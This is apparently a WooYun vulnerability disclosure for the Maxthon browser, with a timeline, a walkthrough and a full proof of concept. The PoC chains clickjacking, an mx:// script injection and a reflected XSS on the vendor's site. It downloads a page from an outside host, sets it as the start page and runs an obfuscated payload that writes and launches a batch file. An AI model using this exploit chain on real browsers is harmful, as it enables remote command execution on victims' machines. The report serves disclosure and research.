乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-02: 细节已通知厂商并且等待厂商处理中 2015-04-02: 厂商已经确认,细节仅向厂商公开 2015-04-05: 细节向第三方安全合作伙伴开放 2015-05-27: 细节向核心白帽子及相关领域专家公开 2015-06-06: 细节向普通白帽子公开 2015-06-16: 细节向实习白帽子公开 2015-07-01: 细节向公众公开
傲游浏览器某缺陷配合clickjacking可导致远程命令执行
傲游浏览器打开RSS时会使用自身的RSS阅读器,如图。
尝试把URL改为
mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?javascript:alert(location.href)
点击标题的时候JS被执行。想了一下,要利用这个漏洞,可以使用点击劫持来做。虽然Internet域不能访问MX域,不过File域却可以。所以可以通过向File域写入一个HTML文件,使用iframe来嵌入MX域。要向File域写入文件,可以使用傲游的API。
external.mxCall('InstallApp', "http://utf7.ml/t/exec1.html");
调用该接口会向Temp目录写入文件,使用下面的接口来获取完整的路径
maxthon.system.Environment.getFolderPath('Mx3data');
接下来只需要访问该文件,用户点击的时候就可以执行任意命令了。所以大概的流程就是用户访问一个URL => 调用接口下载恶意的HTML => 将该HTML文件设置为主页 => 用户打开浏览器,点击首页任意位置 => 执行攻击者设置的命令所以构造如下POC
external.mxCall('InstallApp', "http://utf7.ml/t/exec1.html");var url = maxthon.system.Environment.getFolderPath("Mx3data")+"Temp/exec1.html";maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage",url);
exec1.html源码如下
<style>html, body { background: url(http://utf7.ml/t/bg1.jpg); cursor: pointer;}#box, #box > * { position: absolute; width: 300px; height: 50px; border: 1px solid red; opacity: 0;}#victim { border: none;}</style><div id="box"> <iframe id="victim" src="mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?javascript:eval(String.fromCharCode(118,97,114,32,97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,97,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,97,112,112,47,37,55,66,51,51,67,65,54,48,68,54,45,69,65,68,67,45,52,53,53,56,45,57,49,56,53,45,50,69,66,69,49,52,50,49,52,65,66,57,37,55,68,47,105,110,100,101,120,46,104,116,109,34,59,97,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,98,61,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,70,105,108,101,46,99,114,101,97,116,101,84,101,109,112,70,105,108,101,40,41,59,98,46,110,97,109,101,95,32,61,32,34,68,58,47,116,101,115,116,46,98,97,116,34,59,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,70,105,108,101,87,114,105,116,101,114,40,98,41,59,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,119,114,105,116,101,84,101,120,116,40,34,99,109,100,32,47,107,32,100,105,114,34,41,59,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59,115,101,116,84,105,109,101,111,117,116,40,39,118,97,114,32,99,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,99,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,99,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,99,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,68,58,47,116,101,115,116,46,98,97,116,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,41,59,39,44,49,48,48,48,41,59))" scrolling="no"></iframe></div><script src="https://code.jquery.com/jquery-1.11.0.min.js"></script><script>$(document).mousemove(function(e) { var x = e.pageX; var y = e.pageY; $('#box').css({left: x - 170, top: y - 35});});</script>
这里只是用于演示,所以我只是截了一张i.maxthon.cn的图片作为背景。实际利用的时候可以做的更有欺骗性。PS:图片放在国外的空间,如果测试的时候刷不出图片,把图片传到到国内的服务器就行通过如下URL调用POC
http://web.maxthon.cn/appeal/appeal.php?q=%22%3E%3Cscript%20src=http://utf7.ml/t/maxthon3.js%3E%3C/script%3E
访问上面的URL后,当受害者再次打开浏览器时,首页被修改如下图。
点击首页任意位置,即可执行命令。
测试环境傲游4.4.4.3000 + Win8.1
傲游4.4.5.600_beta + Win8.1
危害等级:高
漏洞Rank:10
确认时间:2015-04-02 22:58
感谢. 网站漏洞+内部页面漏洞
暂无